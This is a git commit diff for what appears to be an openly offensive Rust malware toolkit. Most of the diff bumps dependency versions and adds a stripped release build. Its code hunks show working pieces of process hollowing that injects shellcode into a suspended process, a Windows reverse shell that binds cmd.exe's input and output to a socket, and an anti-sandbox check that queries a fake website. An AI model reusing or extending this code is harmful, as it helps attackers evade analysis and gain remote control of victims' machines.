master merge

This commit is contained in:
koins
2022-03-05 21:30:10 -08:00
14 changed files with 62 additions and 57 deletions
+1 -1
View File
@@ -1,6 +1,6 @@
{
"schemaVersion": 1,
"label": "process_hollowing",
"message": "1.4.2",
"message": "1.4.3",
"color": "blue"
}
+1 -1
View File
@@ -1,6 +1,6 @@
{
"schemaVersion": 1,
"label": "tcp_reverse_shell",
"message": "1.1.3",
"message": "1.1.4",
"color": "blue"
}
Generated
+27 -27
View File
@@ -13,9 +13,9 @@ dependencies = [
[[package]]
name = "anyhow"
version = "1.0.53"
version = "1.0.55"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "94a45b455c14666b85fc40a019e8ab9eb75e3a124e05494f5397122bc9eb06e0"
checksum = "159bb86af3a200e19a068f4224eae4c8bb2d0fa054c7e5d1cacd5cef95e684cd"
[[package]]
name = "async-stream"
@@ -75,9 +75,9 @@ checksum = "c4872d67bab6358e59559027aa3b9157c53d9358c51423c17554809a8858e0f8"
[[package]]
name = "cc"
version = "1.0.72"
version = "1.0.73"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "22a9137b95ea06864e018375b72adfb7db6e6f68cfc8df5a04d00288050485ee"
checksum = "2fff2a6927b3bb87f9595d67196a70493f627687a71d87a0d692242c33f58c11"
[[package]]
name = "cfg-if"
@@ -153,9 +153,9 @@ dependencies = [
[[package]]
name = "getrandom"
version = "0.2.4"
version = "0.2.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "418d37c8b1d42553c93648be529cb70f920d3baf8ef469b74b9638df426e0b4c"
checksum = "d39cd93900197114fa1fcb7ae84ca742095eed9442088988ae74fa744e930e77"
dependencies = [
"cfg-if",
"libc",
@@ -317,9 +317,9 @@ checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646"
[[package]]
name = "libc"
version = "0.2.118"
version = "0.2.119"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "06e509672465a0504304aa87f9f176f2b2b716ed8fb105ebe5c02dc6dce96a94"
checksum = "1bf2e165bb3457c8e098ea76f3e3bc9db55f87aa90d52d0e6be741470916aaa4"
[[package]]
name = "log"
@@ -470,7 +470,7 @@ dependencies = [
[[package]]
name = "process_hollowing"
version = "1.4.2"
version = "1.4.3"
dependencies = [
"nix",
"rco_config",
@@ -586,16 +586,16 @@ version = "0.2.0"
[[package]]
name = "rco_utils"
version = "0.3.0"
version = "0.3.1"
dependencies = [
"windows",
]
[[package]]
name = "redox_syscall"
version = "0.2.10"
version = "0.2.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "8383f39639269cde97d255a32bdb68c047337295414940c68bdd30c2e13203ff"
checksum = "8380fe0152551244f0747b1bf41737e0f8a74f97a14ccefd1148187271634f3c"
dependencies = [
"bitflags",
]
@@ -666,7 +666,7 @@ dependencies = [
[[package]]
name = "tcp_reverse_shell"
version = "1.1.3"
version = "1.1.4"
dependencies = [
"rco_config",
"windows",
@@ -840,9 +840,9 @@ checksum = "360dfd1d6d30e05fda32ace2c8c70e9c0a9da713275777f5a4dbb8a1893930c6"
[[package]]
name = "tracing"
version = "0.1.30"
version = "0.1.31"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "2d8d93354fe2a8e50d5953f5ae2e47a3fc2ef03292e7ea46e3cc38f549525fb9"
checksum = "f6c650a8ef0cd2dd93736f033d21cbd1224c5a967aa0c258d00fcf7dafef9b9f"
dependencies = [
"cfg-if",
"log",
@@ -950,9 +950,9 @@ checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
[[package]]
name = "windows"
version = "0.32.0"
version = "0.33.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "fbedf6db9096bc2364adce0ae0aa636dcd89f3c3f2cd67947062aaf0ca2a10ec"
checksum = "0128fa8e65e0616e45033d68dc0b7fbd521080b7844e5cad3a4a4d201c4b2bd2"
dependencies = [
"windows_aarch64_msvc",
"windows_i686_gnu",
@@ -963,33 +963,33 @@ dependencies = [
[[package]]
name = "windows_aarch64_msvc"
version = "0.32.0"
version = "0.33.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d8e92753b1c443191654ec532f14c199742964a061be25d77d7a96f09db20bf5"
checksum = "cd761fd3eb9ab8cc1ed81e56e567f02dd82c4c837e48ac3b2181b9ffc5060807"
[[package]]
name = "windows_i686_gnu"
version = "0.32.0"
version = "0.33.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "6a711c68811799e017b6038e0922cb27a5e2f43a2ddb609fe0b6f3eeda9de615"
checksum = "cab0cf703a96bab2dc0c02c0fa748491294bf9b7feb27e1f4f96340f208ada0e"
[[package]]
name = "windows_i686_msvc"
version = "0.32.0"
version = "0.33.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "146c11bb1a02615db74680b32a68e2d61f553cc24c4eb5b4ca10311740e44172"
checksum = "8cfdbe89cc9ad7ce618ba34abc34bbb6c36d99e96cae2245b7943cd75ee773d0"
[[package]]
name = "windows_x86_64_gnu"
version = "0.32.0"
version = "0.33.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "c912b12f7454c6620635bbff3450962753834be2a594819bd5e945af18ec64bc"
checksum = "b4dd9b0c0e9ece7bb22e84d70d01b71c6d6248b81a3c60d11869451b4cb24784"
[[package]]
name = "windows_x86_64_msvc"
version = "0.32.0"
version = "0.33.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "504a2476202769977a040c6364301a3f65d0cc9e3fb08600b2bda150a0488316"
checksum = "ff1e4aa646495048ec7f3ffddc411e1d829c026a2ec62b39da15c1055e406eaa"
[[package]]
name = "xor_params"
+4
View File
@@ -9,3 +9,7 @@ members = [
"xor_params",
"remote_access_trojan",
]
[profile.release]
lto = true
strip = true
+3 -3
View File
@@ -1,9 +1,9 @@
[package]
name = "process_hollowing"
version = "1.4.2"
version = "1.4.3"
edition = "2021"
authors = ["Kevin Conley <koins@duck.com>"]
rust-version = "1.58"
rust-version = "1.59"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
@@ -19,7 +19,7 @@ rco_utils = {path = "../rco_utils"}
nix = ">=0.16"
[target.'cfg(windows)'.dependencies]
windows.version = ">=0.26.0"
windows.version = ">=0.33.0"
windows.features = [
"Win32_Foundation",
"Win32_Security",
@@ -1,7 +1,7 @@
extern crate windows;
use std::{mem, ptr};
use std::ffi::{CString, c_void};
use windows::Win32::Foundation::PSTR;
use windows::core::{PCSTR, PSTR};
use windows::Win32::System::Diagnostics::Debug::{ReadProcessMemory, WriteProcessMemory};
use windows::Win32::System::Threading::{CreateProcessA, CREATE_SUSPENDED, NtQueryInformationProcess, PROCESS_BASIC_INFORMATION, PROCESS_INFORMATION, PROCESSINFOCLASS, ResumeThread, STARTUPINFOA};
@@ -44,10 +44,10 @@ pub fn hollow_and_run(shellcode: &[u8], target_process: &str) {
// Use CreateProcessW to create a suspended process that will be hollowed out for the shellcode
// WINDOWS --> https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessw
// RUST --> https://microsoft.github.io/windows-docs-rs/doc/windows/Win32/System/Threading/fn.CreateProcessW.html
let lp_application_name: PSTR = unsafe { mem::zeroed() };
let lp_application_name: PCSTR = unsafe { mem::zeroed() };
let mut lp_command_line: PSTR = unsafe { mem::zeroed() };
lp_command_line.0 = CString::new(target_process).unwrap().into_raw() as *mut u8;
let lp_current_directory: PSTR = unsafe { mem::zeroed() };
let lp_current_directory: PCSTR = unsafe { mem::zeroed() };
let creation_result = unsafe { CreateProcessA(
lp_application_name,
lp_command_line,
@@ -56,7 +56,7 @@ pub fn hollow_and_run(shellcode: &[u8], target_process: &str) {
false,
CREATE_SUSPENDED,
ptr::null() as *const _,
&lp_current_directory,
lp_current_directory,
&startup_info,
&mut process_information) };
if !creation_result.as_bool() {
+2 -2
View File
@@ -3,7 +3,7 @@ name = "process_migration"
version = "1.6.2"
edition = "2021"
authors = ["Kevin Conley <koins@duck.com>"]
rust-version = "1.58"
rust-version = "1.59"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
@@ -19,7 +19,7 @@ rco_utils = {path = "../rco_utils"}
nix = ">=0.16"
[target.'cfg(windows)'.dependencies]
windows.version = ">=0.26.0"
windows.version = ">=0.33.0"
windows.features = [
"Win32_Foundation",
"Win32_Security",
+1 -1
View File
@@ -3,7 +3,7 @@ name = "rco_config"
version = "0.2.0"
edition = "2021"
authors = ["Kevin Conley <koins@duck.com>"]
rust-version = "1.58"
rust-version = "1.59"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+3 -3
View File
@@ -1,9 +1,9 @@
[package]
name = "rco_utils"
version = "0.3.0"
version = "0.3.1"
edition = "2021"
authors = ["Kevin Conley <koins@duck.com>"]
rust-version = "1.58"
rust-version = "1.59"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
@@ -13,7 +13,7 @@ antisand = ["windows"]
[target.'cfg(windows)'.dependencies]
windows.optional = true
windows.version = ">=0.26.0"
windows.version = ">=0.33.0"
windows.features = [
"Win32_Foundation",
"Win32_Networking",
+6 -6
View File
@@ -60,7 +60,7 @@ use std::ffi::CString;
#[cfg(all(windows, feature = "antisand"))]
extern crate windows;
#[cfg(all(windows, feature = "antisand"))]
use windows::Win32::Foundation::PSTR;
use windows::core::PCSTR;
#[cfg(all(windows, feature = "antisand"))]
use windows::Win32::Networking::WinInet::{InternetOpenA, InternetOpenUrlA};
@@ -70,18 +70,18 @@ pub fn pound_sand() -> bool {
// Call InternetOpenA to get a handle that can be used in an actual internet request
// WINDOWS --> https://docs.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-internetopena
// RUST --> https://microsoft.github.io/windows-docs-rs/doc/windows/Win32/Networking/WinInet/fn.InternetOpenA.html
let mut lpsz_agent: PSTR = unsafe { mem::zeroed() };
let mut lpsz_agent: PCSTR = unsafe { mem::zeroed() };
lpsz_agent.0 = CString::new("Name in user-agent").unwrap().into_raw() as *mut u8;
let lpsz_proxy: PSTR = unsafe { mem::zeroed() };
let lpsz_proxy_bypass: PSTR = unsafe { mem::zeroed() };
let lpsz_proxy: PCSTR = unsafe { mem::zeroed() };
let lpsz_proxy_bypass: PCSTR = unsafe { mem::zeroed() };
let internet_handle = unsafe { InternetOpenA(lpsz_agent, 0, lpsz_proxy, lpsz_proxy_bypass, 0) };
// Call InternetOpenUrlA on a fake website; if there is a response, it's a sandbox trying to get you to take further action
// WINDOWS --> https://docs.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-internetopenurla
// RUST --> https://microsoft.github.io/windows-docs-rs/doc/windows/Win32/Networking/WinInet/fn.InternetOpenUrlA.html
let mut lpsz_url: PSTR = unsafe { mem::zeroed() };
let mut lpsz_url: PCSTR = unsafe { mem::zeroed() };
lpsz_url.0 = CString::new("https://www.thisisafakewebsiteorelsetheantisanboxcheckwillfail4sure.com").unwrap().into_raw() as *mut u8;
let lpsz_headers: PSTR = unsafe { mem::zeroed() };
let lpsz_headers: PCSTR = unsafe { mem::zeroed() };
let website = unsafe { InternetOpenUrlA(internet_handle, lpsz_url, lpsz_headers, 0, 0, 0) };
if website != 0 as _ {
return true
+1 -1
View File
@@ -3,7 +3,7 @@ name = "remote_access_trojan"
version = "0.1.0"
edition = "2021"
authors = ["Kevin Conley <koins@duck.com>"]
rust-version = "1.58"
rust-version = "1.59"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+3 -3
View File
@@ -1,9 +1,9 @@
[package]
name = "tcp_reverse_shell"
version = "1.1.3"
version = "1.1.4"
edition = "2021"
authors = ["Kevin Conley <koins@duck.com>"]
rust-version = "1.58"
rust-version = "1.59"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
@@ -11,7 +11,7 @@ rust-version = "1.58"
rco_config = {path = "../rco_config"}
[target.'cfg(windows)'.dependencies]
windows.version = ">=0.26.0"
windows.version = ">=0.33.0"
windows.features = [
"Win32_Foundation",
"Win32_Security",
@@ -1,7 +1,8 @@
extern crate windows;
use std::{mem, ptr};
use std::ffi::{CString, c_void};
use windows::Win32::Foundation::{HANDLE, PSTR};
use windows::core::{PCSTR, PSTR};
use windows::Win32::Foundation::HANDLE;
use windows::Win32::Networking::WinSock::{connect, htons, inet_pton, SOCKADDR, SOCKADDR_IN, SOCKET, WSAData, WSASocketA, WSAStartup};
use windows::Win32::Security::SECURITY_ATTRIBUTES;
use windows::Win32::System::Threading::{CreateProcessA, PROCESS_CREATION_FLAGS, PROCESS_INFORMATION, STARTF_USESTDHANDLES, STARTUPINFOA};
@@ -46,7 +47,7 @@ pub fn shell(ip: &str, port: u16) {
// This is magic that I don't really understand but seems to work
let sin_addr_ptr: *mut c_void = &mut sockaddr_in.sin_addr as *mut _ as *mut c_void;
// Create a PSTR and use the IP string as the 0 field
let mut ip_pstr: PSTR = unsafe { mem::zeroed() };
let mut ip_pstr: PCSTR = unsafe { mem::zeroed() };
ip_pstr.0 = CString::new(ip).unwrap().into_raw() as *mut u8;
// Calling pton with the pointer sin_addr_ptr --> sockaddr_in.sin_addr should mean sockaddr_in.sin_addr has the IP struct now
let conversion_result = unsafe { inet_pton(AF_INET_I32, ip_pstr, sin_addr_ptr) };
@@ -78,13 +79,13 @@ pub fn shell(ip: &str, port: u16) {
startup_info.hStdInput = unsafe { *sock_handle };
startup_info.hStdOutput = unsafe { *sock_handle };
startup_info.hStdError = unsafe { *sock_handle };
let lp_application_name: PSTR = unsafe { mem::zeroed() };
let lp_application_name: PCSTR = unsafe { mem::zeroed() };
let mut lp_command_line: PSTR = unsafe { mem::zeroed() };
lp_command_line.0 = CString::new("C:\\Windows\\System32\\cmd.exe").unwrap().into_raw() as *mut u8;
let lp_process_attributes: SECURITY_ATTRIBUTES = unsafe { mem::zeroed() };
let lp_thread_attributes: SECURITY_ATTRIBUTES = unsafe { mem::zeroed() };
let dw_creation_flags: PROCESS_CREATION_FLAGS = unsafe { mem::zeroed() };
let lp_current_directory: PSTR = unsafe { mem::zeroed() };
let lp_current_directory: PCSTR = unsafe { mem::zeroed() };
let mut process_information: PROCESS_INFORMATION = unsafe { mem::zeroed() };
let create_res = unsafe {
CreateProcessA(lp_application_name,
+1 -1
View File
@@ -3,7 +3,7 @@ name = "xor_params"
version = "1.1.1"
edition = "2021"
authors = ["Kevin Conley <koins@duck.com>"]
rust-version = "1.58"
rust-version = "1.59"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html